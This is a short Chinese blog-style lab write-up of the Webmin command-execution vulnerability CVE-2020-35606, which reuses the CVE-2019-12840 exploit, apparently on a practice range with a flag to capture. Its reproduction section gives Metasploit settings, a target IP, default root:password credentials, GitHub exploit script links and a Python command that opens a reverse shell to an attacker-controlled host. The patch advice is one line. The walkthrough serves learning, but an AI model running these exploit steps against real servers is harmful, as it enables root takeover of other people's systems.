- Webmin 命令执行漏洞 (CVE-2020-35606)
- 0x01 漏洞描述
- 0x02 影响范围
- 0x03 漏洞复现
- 使用msf复现
- 利用脚本 成功
- 0x04 漏洞修复
Webmin是Webmin社区的一套基于Web的用于类Unix *** 作系统中的系统管理工具。 Webmin 1.962版本及之前版本存在安全漏洞,该漏洞允许执行任意命令。任何被授权使用Package Updates模块的用户都可以使用根权限通过包含和的向量执行任意命令。 账户密码:root:password
CVE-2020-35606使用的还是CVE-2019-12840的执行脚本,换了新的载体,利用方式还是一样的
https://ip:port/session_login.cgi
0x02 影响范围Webmin 1.962版本及之前版本
0x03 漏洞复现 使用msf复现脚本地址
https://github.com/puckiestyle/CVE-2020-35606
下载下导入msf后 relod_all 失败 后来将文件名改为
webmin_pu_escape_bypass_rce.rb
重启msfconsole 导入成功 不知道是不是文件名原因
导入msf方法
使用脚本
search webmin use 6 info 查看脚本信息 set rhosts 118.193.36.37 set rport 9720(一般是10000) set ssl true (开启ssl就设为true) set username root # 运行时提示 要账号密码 就又加上 set password password check #检查是否存在漏洞
漏洞存在
反dshell 的话
在之前基础上 set lhost vps的ip run
不知道为什么创建会话失败
webmin_cve-2019-12840_poc
脚本地址
https://github.com/KrE80r/webmin_cve-2019-12840_poc
python3运行
使用前注意修改 py文件中的 121行的端口号
反dshell
python CVE-2019-12840.py -u https://vulfocus.fofa.so -U root -P password -lhost x.x.x.x -lport 9897
脚本反dshell成功
flag获取
升级到最新版本
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)